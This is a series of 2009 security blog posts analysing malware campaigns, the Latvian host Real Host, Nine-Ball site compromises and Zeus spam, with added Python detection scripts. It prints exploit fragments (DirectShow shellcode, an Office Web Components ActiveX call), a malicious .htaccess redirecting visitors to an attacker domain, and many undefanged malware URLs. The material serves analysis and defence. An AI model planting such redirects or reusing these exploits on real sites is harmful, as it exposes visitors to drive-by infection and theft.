RFI Attacks


Real Host, Latvia – RBN Resurgence or Clone

A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (Part 1 | Part 2)

The attackers use the same techniques to exploit victims, but this time they have moved to new domains and updated their payloads. Two payloads that steal banking credentials and send SPAM are dropped on compromised hosts at the end of the attack. These payloads are delivered by multiple exploits, including an unpatched 0day vulnerability and one that was previously unpatched.

Directshow – MS09-028 (previously a 0day, patched recently)

function directshow()
{
    var shellcode=unescape("%uC033…

    obj.data='./directshow.php';
    obj.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Microsoft Office Web Components (unpatched 0day)

function spreadsheet()
{
    try
    {
        var objspread=new ActiveXObject('OWC10.Spreadsheet');
    }
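As an added example (not code from the original post), here is a small Python scanner a defender could run over captured landing pages to flag the markers the two snippets above expose: the OWC10.Spreadsheet progid, the DirectShow classid, and long runs of %u escapes inside unescape(), which is the usual shellcode encoding. The sample page, the function names and the filler escapes are constructed for this example; the indicator values come from the snippets above.

```python
import re

# Indicators taken from the two snippets above: the progid used by the Office
# Web Components exploit and the classid used by the DirectShow exploit.
SUSPICIOUS_PROGIDS = {"OWC10.Spreadsheet"}
SUSPICIOUS_CLASSIDS = {"0955AC62-BF2E-4CBA-A2B9-A63F772D46CF"}

ACTIVEX_RE = re.compile(r"new\s+ActiveXObject\(\s*['\"]([^'\"]+)['\"]\s*\)", re.I)
CLASSID_RE = re.compile(r"clsid:([0-9A-F-]{36})", re.I)
# Eight or more consecutive %uXXXX units inside unescape() is the classic
# heap-spray / shellcode encoding; each unit is six characters long.
SHELLCODE_RE = re.compile(r"unescape\(\s*['\"]((?:%u[0-9A-F]{4}){8,})", re.I)

# Constructed sample landing page for this example. The %u0000 units are
# placeholder filler, not real shellcode; only the shape matters to the scanner.
SAMPLE_PAGE = """
<html><body><object id="obj"></object><script>
function directshow() {
  var shellcode = unescape("%uC033""" + "%u0000" * 8 + """");
  obj.data = './directshow.php';
  obj.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
}
function spreadsheet() {
  try { var objspread = new ActiveXObject('OWC10.Spreadsheet'); } catch (e) {}
}
</script></body></html>
"""

def scan_page(html):
    """Return (indicator_type, value) pairs found in captured HTML/JavaScript."""
    hits = []
    for progid in ACTIVEX_RE.findall(html):
        if progid in SUSPICIOUS_PROGIDS:
            hits.append(("activex_progid", progid))
    for clsid in CLASSID_RE.findall(html):
        if clsid.upper() in SUSPICIOUS_CLASSIDS:
            hits.append(("classid", clsid.upper()))
    for blob in SHELLCODE_RE.findall(html):
        hits.append(("unescape_shellcode", f"{len(blob) // 6} %u units"))
    return hits

if __name__ == "__main__":
    for kind, value in scan_page(SAMPLE_PAGE):
        print(f"{kind}: {value}")
```

The progid and classid lists are meant to be extended from advisories as new controls are abused; the unescape() rule is deliberately generic so that it keeps firing when the attackers rotate domains and classids, as this post shows they did.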

After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia, it quickly became apparent how bad this host is. A quick search leads to a blog written by Dynamoo where the activities of this host were first uncovered. Delving deeper into this provider, it is apparent that they are a major hub of cybercrime activity, which we will discuss further. This post has been prepared in conjunction with Jart Armin from HostExploit.com. Jart will present a higher level view of Real Host’s activities in relation to other entities and, most interestingly, how they relate to the former Russian Business Network (RBN).

It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.

Observed Hostile Activity:

  • Exploits including unpatched (or soon to be patched) 0days
  • Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan
  • Phishing sites
  • Moneymule recruitment sites
  • Botnet Command and Control servers
  • Hosting of cybercrime websites – Iframe programs
  • Distributing licensed software (Warez)

Real Host has 3 /28 IP blocks (48 IPs) that they get from Junik (AS8206). These are:

inetnum: 213.182.197.0 - 213.182.197.15
netname: Real_Host_NET3
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.224 - 213.182.197.239
netname: Real_Host_NET1
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.240 - 213.182.197.255
netname: Real_Host_NET2
descr: Real Host
country: LV
abuse-mailbox: abusemailhost@gmail.com

The first indication of suspicious activity is the use of gmail addresses as abuse contacts.

Next, here is data from my security tools showing attacks and the dates associated with them:

Date       IP               Domain                     URL                        Purpose
5/6/2009   213.182.197.230  update.dom11z.cn           /                          Multiple Exploits
6/2/2009   213.182.197.227  test.corbsc.com            /splt/getpdf.php           Multiple Exploits
6/4/2009   213.182.197.229  2k90.cn                    /2/include/spl.php         Multiple Exploits
6/5/2009   213.182.197.229  2k90.cn                    /2/include/spl.php         Multiple Exploits
6/10/2009  213.182.197.237  downloadoemsoftware.com    /exempl/include/spl.php    Multiple Exploits
6/15/2009  213.182.197.237  downloadoemsoftware.com    /exempl/include/spl.php    Multiple Exploits
7/10/2009  213.182.197.237  noplit.ws                  /exempl/include/spl.php    Multiple Exploits
7/10/2009  213.182.197.229  businessconsulting312.com  /bus_trf/1/pdf.php         Multiple Exploits
7/10/2009  213.182.197.229  businessconsulting312.com  /bus_trf/1/pdf.php         Multiple Exploits
5/6/2009   213.182.197.23   lieliteautobody.cn         /load.php                  Payloads
5/6/2009   213.182.197.23   lieliteautobody.cn         /load.php                  Payloads
6/2/2009   213.182.197.227  test.corbsc.com            /splt/getexe.php           Payloads
6/6/2009   213.182.197.5    virus-detect-soft.com      /antivirus.exe             Payloads
6/6/2009   213.182.197.5    virus-detect-soft.com      /antivirus.exe             Payloads
6/10/2009  213.182.197.237  downloadoemsoftware.com    /exempl/load.php           Payloads
7/18/2009  213.182.197.237  5fgh.ws                    /expli/update.php          Payloads

A little manual investigation led me to the following:

IP               Domain                  Purpose                                              More Information
213.182.197.229  yourgoogleanalytics.us  Money Mule Recruiting                                Link
213.182.197.229  barwellsgroup.cn        Money Mule Recruiting                                Related to above
213.182.197.249  Vikd3jj-3.com           Malware
213.182.197.251  2k90.cn                 Malware
213.182.197.13   Mac-videos.com          Mac Trojan                                           Link
213.182.197.236  71speed.info            Leads to Banking Trojan (Silent Banker) & Spambot
213.182.197.8    bestxvids.info          Zlob                                                 Link
213.182.197.249  traffic-searches.cn     Botnet C&C                                           Link
213.182.197.237  1gigabayt.com           Zeus C&C                                             Link
213.182.197.14   iframepartners.com      Iframe sellers
213.182.197.228  Chlenopopik.com         Zeus C&C                                             Link
213.182.197.14   Megavipsite.cn          Malware                                              Link
213.182.197.20   Traffcount.cn           Malware                                              Link
213.182.197.229  Newskyag.com            Money Mule Recruiting / Zeus C&C                     Link
213.182.197.235  Traffic-exchange.ru     Part of iframe redirection service                   Link
213.182.197.10   vlkontacte.ru           Russian Social Network Phish
213.182.197.251  Botnet.su               Zeus C&C                                             Link

The domain I found most amusing was botnet.su, the attackers clearly aren’t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.

Zeus seems to be one of the most common threats being hosted from Real Host’s network. According to recent information released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.

To begin, let’s look at the money mule sites, Barwells Group and NewskyAG. Here is an excerpt from the link included above:

BarwellsGroup

“During the trial period (1 month), you will be paid 2000 USD per month
while working on average 3 hours per day, Monday-Friday, plus 5
commission from every transactions or task received and processed. The
salary will be sent in the form of wire transfer directly to your
account. After the trial period your base pay salary will go up to
3,500USD per month, plus 5 commission.”

Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!

NewskyAG

Not only does this domain operate a money mule scam, it also ran a Zeus C&C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:

Q: “Anyone ever heard of a company called NewSky Ag?”

A: “Yes I work for them from home and so far everything is ok but I’ve only been doing it about 2 months so if you have any more ? please let me know”

Next we have a phish for a Russian social networking site.

[Image: phish2]

Lastly, let’s look at iframepartners.com. The site is currently down; however, information is still available. The site pays malicious web admins to put iframes on their compromised websites. A colleague of mine was kind enough to translate the text from Russian (thanks Alex!). It reads:

1. A partner pays for iframe traffic, we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K depending on traffic quality

2. We accept only ads that generate more than 50K USA traffic

3. You are prohibited to install anything else with our iframe

4. Adult traffic is not welcomed

5. An account will be deleted without payout in case of detection of spam or worm traffic

6. We have been deleting accounts that are not active for few days

7. Cheaters and hit-boters, please don’t waste our time, look for other places

8. Payout twice a month, in the beginning and in the middle of month
Use XXX XXXXXX to contact us

Notice how adult sites, worms and spam traffic are not allowed? This is probably because they are very noisy and easily spotted by security professionals.

This leads to another site called installing.cc. This site pays for installing malware onto compromised PCs.

[Image: installing.cc]

Another interesting hit comes up from a design company called web-alfa.com. They designed an eye catching flash banner advertisement for the attackers.

[Image: Real Host advertisement]

[Image: advert1]

The slides in the flash movie say:

Long-live substitution,

And software sale,

Referral system,

And other life enjoyments

For invitation and detailed information contact us via XXX XXXXXX

Clearly Real Host Ltd is hosting major cybercrime activity, as a vast number of IPs in their space host malicious content. Several of the domains hosted with them were used by the former RBN. Real Host represents a major threat to individuals, businesses and the safety of the Internet ecosystem.


Nine-Ball followup now with video! Part 2

As a follow up to my previous post, here is the next video depicting the second portion of the attack. For URLs, Virustotal results, etc refer back to Part 1. All analysis is conducted with Malzilla.

To give you some additional insight into the attack, I am also able to share the contents of a hacked server’s .htaccess file. The miscreants upload this file to automatically redirect visitors to a site under their control.

These lines will redirect all requests for 400,401,403,404 and 500 pages to ake.kz, the attacker controlled site.

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

The following entries check to see if a user has been referred to the compromised website by a search engine. If they have, they will be automatically forwarded on to the attacker’s site, ake.kz.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]
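The same redirect logic can be audited automatically after a compromise such as the stolen-FTP-credential case in Part 1. The following Python script is an added example, not part of the original post: it parses an .htaccess file and flags ErrorDocument directives that point off-site, plus off-site RewriteRule targets, marking those gated by HTTP_REFERER conditions as the search-engine cloaking pattern shown above. The sample .htaccess is constructed for the example from the lines quoted above with two benign directives mixed in, and the own-host name (www.example.com) is a placeholder.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the attacker lines quoted above, plus two benign
# directives (a local error page and an on-site 301) that must not be flagged.
SAMPLE_HTACCESS = """\
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 /errors/500.html
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]
RewriteRule ^old-page$ /new-page [R=301,L]
"""

def is_external(target, own_hosts):
    """True when target is an absolute http(s) URL whose host is not one of ours."""
    parsed = urlparse(target.strip())
    return parsed.scheme in ("http", "https") and parsed.hostname not in own_hosts

def audit_htaccess(text, own_hosts):
    """Return (line_number, finding_type, target) for suspicious directives."""
    findings = []
    referer_conds = []          # RewriteCond lines waiting for their RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "errordocument":
            # ErrorDocument <code> <target>: an absolute off-site URL turns every
            # 404/500 on the site into a redirect to the attacker.
            if len(parts) >= 3 and is_external(parts[2], own_hosts):
                findings.append((lineno, "external_errordocument", parts[2]))
            referer_conds = []
        elif directive == "rewritecond":
            # RewriteCond <testvar> <pattern> [flags]; only referrer checks matter here.
            if len(parts) >= 3 and "HTTP_REFERER" in parts[1].upper():
                referer_conds.append(parts[2])
        elif directive == "rewriterule":
            # RewriteRule <pattern> <substitution> [flags]
            if len(parts) >= 3 and is_external(parts[2], own_hosts):
                kind = "referer_cloaked_redirect" if referer_conds else "external_redirect"
                findings.append((lineno, kind, parts[2]))
            referer_conds = []
        else:
            # Any other directive breaks a RewriteCond group in Apache.
            referer_conds = []
    return findings

if __name__ == "__main__":
    for lineno, kind, target in audit_htaccess(SAMPLE_HTACCESS, {"www.example.com"}):
        print(f"line {lineno}: {kind} -> {target}")
```

Run it over every .htaccess under the web root (attackers often drop them in subdirectories as well). Redirects to the site's own hostnames are left alone, so a legitimate 301 does not generate noise; anything off-site, and especially anything off-site that only fires for search-engine visitors, is worth a look.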


Nine-Ball followup now with video! Part 1

A reader was gracious enough to share some information with me on the events surrounding the compromise of a website of his. The site was compromised via stolen FTP credentials which has been a technique employed by major Internet threats such as Gumblar and Nine-ball recently. This will be a two part post.

Let’s take a look at what happens to the victim webserver after it gets compromised and the malware involved. To make this post more interesting I’ve decided to deliver my analysis via video! Rather than the standard nerve grating rock music that people tend to add to videos like this I have opted for my genre of choice, electronic :) . I’ve included VirusTotal results, domains involved, etc. at the end of the post.

Sit back, relax and enjoy the ride.

Domains / URLs involved:

71speed.info
xbx.tw/in.cgi?6
xbx.tw/in.cgi?3
zyejanag.cn/rf/
fvuligir.cn/s/in.cgi?11
84.244.138.58/ts/in.cgi?chtr&5f9d90
esli.tw/load.php?e=1
esli.tw/2/index.php
esli.tw/show.php?s=18f8bc6e98

Exploits Used:

MDAC -- MS06-014
Adobe Acrobat -- CVE-2008-2992 & CVE-2009-0927
Adobe Flash Player (not sure which one)
Microsoft DirectShow & Office Web Components zero days
Microsoft Snapshot Viewer MS08-041

Virustotal Payload 1 & ThreatExpert Payload 1 -- SilentBanker -- Banking Trojan

Virustotal Payload 2 & ThreatExpert Payload 2 -- Tedroo -- SpamBot

Wepawet PDF exploit


Major Report Coming via HostExploit team

It’s been a while since I posted, unfortunately, but it’s not due to a lack of attacks to talk about! :) Some time ago I was approached by the Host Exploit open source security research group and they asked me if I would help contribute to their efforts. This is the group that put together the research that led to the McColo, Atrivo and EST Domains take downs. Since I’m always trying to get the word out on attacks and threats, the answer was quite obvious.

So this means my spare time has been mostly spent contributing to the next major report from the HostExploit team. Look for it in the coming weeks, it’s going to be very juicy :)


One Click Hosting Spreads Banking Trojan

While this is not totally new, I only recently came across my first event involving a one click host serving malware. What is one click hosting? These are providers which you have probably heard of before, such as RapidShare, Megaupload, yousendit and many, many more. Wikipedia has a listing of many of them. These providers allow you to share files via HTTP for free, or for a small fee for premium service.

In the last few weeks (beginning June 17th), a particular OCH (one click host) hotlinkfiles.com began serving up malware. The host uses AV according to a March 25th, 2008 post on their website:

“Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.”

The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:

hotlinkfiles.com /files/2607508_gs2zp/eudenoite1.scr
premium.hotlinkfiles.com /files/2619000_idqqh/fotosanexadas.scryh
hotlinkfiles.com /files/2637460_lnqnl/DSC_804.jpg.scr
premium.hotlinkfiles.com /files/2645684_c2awa/fotosanexadas.scr
hotlinkfiles.com /files/2645758_i45ka/DSC_805.jpg.scr

Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought an account or has used an account stolen from an unsuspecting victim.

Detection for the first stage download is pretty good at 30/41, most vendors detect it as Banload which is also classed as a banking trojan. [Virustotal1] [Virustotal2]

Downloader.Banload.AMIX
Win-Trojan/Banload.71680.O
Win32/TrojanDownloader.Banload.BDA

PWS-Banker!ee
Mal_Banker

The file downloads several more payloads which are all executables [Threatexpert] however the detection rate is terrible on them with most being detected by 0/41 vendors. [Virustotal]

hxxp://gay24x01.hpg.ig.com.br/ree1.html
hxxp://gay24x01.hpg.ig.com.br/ree2.html
hxxp://gay24x02.hpg.ig.com.br/nl2.html
hxxp://gay24x02.hpg.ig.com.br/nl3.html
hxxp://gay24x02.hpg.ig.com.br/nl4.html
hxxp://gay24x02.hpg.ig.com.br/nl5.html
hxxp://gay24x02.hpg.ig.com.br/nl6.html
hxxp://gay24x02.hpg.ig.com.br/nl7.html

So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, web content filtering will not block them. The second stage URL can still be blocked, however it can change and analysis must be performed before the second stage URL can be found. In a corporate environment, you may want to consider blocking these file transfer services if they are not needed.

As for where this attack came from, it was delivered via SPAM with a subject line of “fotos [date]” and is written in Portuguese. The text reads “These photos are very funny”.

Portuguese SPAM with malware


Finding the Unknown – Detecting Emailed Malware Waves

In a previous post I discussed using the technique of watching for the transfer of executable files around the network as a method of intrusion detection. This is a great way of discovering machines that were attacked where IDS failed to detect the exploit(s) due to obfuscation.

Another method I’d like to highlight is looking for password-protected zip files. Like the transfer of executables, password-protected zips are perfectly legitimate on their own, which is why this is a hunting signature rather than a blocking one. Let’s take Zeus as an example.

Zeus/Zbot/WSNpoem spreads both via web exploits and SPAM runs. In order to get the payload past AV detection, the malware author encrypts the file and provides the password in the body of the message. AV cannot scan within the archive and can only match on a specific signature for the encrypted archive itself.

There was one of these runs earlier this week (June 24th), which is easily detected by a signature that looks for password-protected zips. You might think that a signature like this would generate a lot of events, and it does; however, it is easy to sort through them and find the attacks. The file name used in this attack was “djellow.zip”. A quick search leads us to this article over at abuse.ch.
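To show what such a signature actually keys on, here is an added Python example (not code from the original post). A password-protected entry has bit 0 of the general purpose flag set in both its local file header and its central directory record; a detector can read that bit without the password and without extracting anything, and can also note executable names inside the archive for triage. Because Python’s zipfile module cannot write encrypted entries, the sample archive is constructed by setting that flag bit by hand; the entry names and contents are made up for the example.

```python
import io
import struct
import zipfile

ENCRYPTED_FLAG = 0x0001        # bit 0 of the general purpose bit flag
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")

def build_sample_zip(name, payload, password_protected):
    """Constructed test data: an in-memory zip with one STORED entry.
    For the protected case the encryption bit is set by hand in the local
    header (flag at offset 6) and the central directory record (offset 8),
    which is exactly the bit a detector keys on; the content itself is inert."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, payload)
    data = bytearray(buf.getvalue())
    if password_protected:
        for signature, flag_offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            pos = data.find(signature)
            while pos != -1:
                off = pos + flag_offset
                flags = struct.unpack_from("<H", data, off)[0] | ENCRYPTED_FLAG
                struct.pack_into("<H", data, off, flags)
                pos = data.find(signature, pos + 1)
    return bytes(data)

def inspect_attachment(filename, data):
    """Classify an attachment by reading only the zip central directory."""
    report = {"filename": filename, "is_zip": False,
              "encrypted_entries": [], "executable_entries": []}
    if not data.startswith(b"PK\x03\x04"):
        return report
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    report["is_zip"] = True
    report["encrypted_entries"] = [i.filename for i in infos
                                   if i.flag_bits & ENCRYPTED_FLAG]
    report["executable_entries"] = [i.filename for i in infos
                                    if i.filename.lower().endswith(EXECUTABLE_EXT)]
    return report

def should_alert(report):
    """Fire on any password-protected zip; the analyst then sorts by name and
    sender, as the post describes. Executable names inside raise priority."""
    return report["is_zip"] and bool(report["encrypted_entries"])

if __name__ == "__main__":
    # Constructed attachments: a protected archive hiding an executable, and a
    # plain archive of the kind normal business mail carries.
    for fname, blob in (("photos.zip", build_sample_zip("photo.jpg.exe", b"MZ not a program", True)),
                        ("report.zip", build_sample_zip("report.txt", b"quarterly numbers", False))):
        r = inspect_attachment(fname, blob)
        print(fname, "ALERT" if should_alert(r) else "ok", r["encrypted_entries"], r["executable_entries"])
```

The scanner never opens the entries, so it costs nothing beyond parsing the central directory, and it works the same whether the sample came from a mail gateway quarantine or from carved network traffic. Entry names are still visible in an encrypted zip, which is why the executable-extension check is useful for ranking the events this signature produces.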

The messages were sent from a number of IPs, including:

95.25.108.154
95.24.3.119
89.248.207.69
88.227.199.86
86.105.126.142
85.100.177.112
84.92.85.139
84.204.112.15
84.104.97.35
83.5.144.32
78.176.8.64
78.166.216.115
78.161.81.160
78.158.51.103
77.77.15.208
77.255.254.214
76.175.144.40
72.179.5.10
71.124.158.42
209.239.38.24
201.22.7.148
201.15.77.229
201.0.136.67
200.68.63.226
200.56.79.179
190.175.133.38
189.78.200.43
188.47.4.252
187.14.9.68

The two worst offenders are Brazil and Turkey with 5 IPs each.

ASN    IP              Prefix           Country  Description
18881  201.22.7.148    201.22.0.0/18    BR       Global Village Telecom
8167   201.15.77.229   201.15.64.0/18   BR       TELESC - Telecomunicacoes de Santa Catarina SA
27699  201.0.136.67    201.0.0.0/16     BR       TELECOMUNICACOES DE SAO PAULO S/A - TELESP
27699  189.78.200.43   189.78.0.0/16    BR       TELECOMUNICACOES DE SAO PAULO S/A - TELESP
7738   187.14.9.68     187.14.0.0/19    BR       Telecomunicacoes da Bahia S.A.
9121   88.227.199.86   88.227.128.0/17  TR       TTNET TTnet Autonomous System
9121   85.100.177.112  85.100.128.0/17  TR       TTNET TTnet Autonomous System
9121   78.176.8.64     78.176.0.0/17    TR       TTNET TTnet Autonomous System
9121   78.166.216.115  78.166.128.0/17  TR       TTNET TTnet Autonomous System
9121   78.161.81.160   78.161.0.0/17    TR       TTNET TTnet Autonomous System

Attacks using password protected zips can now be identified and their sources uncovered without having to rely solely on exploit or attack related signatures. All that’s needed is a detective hat and knowledge of current threats.
